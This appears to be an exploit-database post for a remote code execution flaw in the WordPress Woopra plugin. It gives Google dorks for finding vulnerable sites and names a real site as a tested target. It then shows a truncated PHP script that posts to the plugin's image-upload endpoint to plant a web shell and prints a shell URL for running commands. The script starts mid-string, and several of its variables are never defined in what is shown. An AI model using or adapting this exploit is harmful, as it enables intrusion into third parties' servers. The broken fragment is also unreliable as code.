WordPress Woopra Remote Code Execution

# Exploit Title: woopra plugins execute arbitrary PHP code Exploit # Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/ # Date: [06-10-2013] # Exploit Author: wantexz # Vendor Homepage:wordpress.org/plugins/woopra/ # Software Link: wordpress.org/plugins/woopra # Version: woopra # Tested on: [wantexz] # CVE : # target tested: http://zainhd.com/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php ############################################################################################ # INDONESIANCODER # by # WANTEXZ # ############################################################################################ [php] "; $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'Content-Type: text/plain'); echo " [+] Submitting request to: {$options['u']}\n"; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) { echo " [+] Exploit completed successfully!\n"; echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n"; } else { die(" [+] Exploit was unsuccessful.\n"); } ?>[/php]

发表评论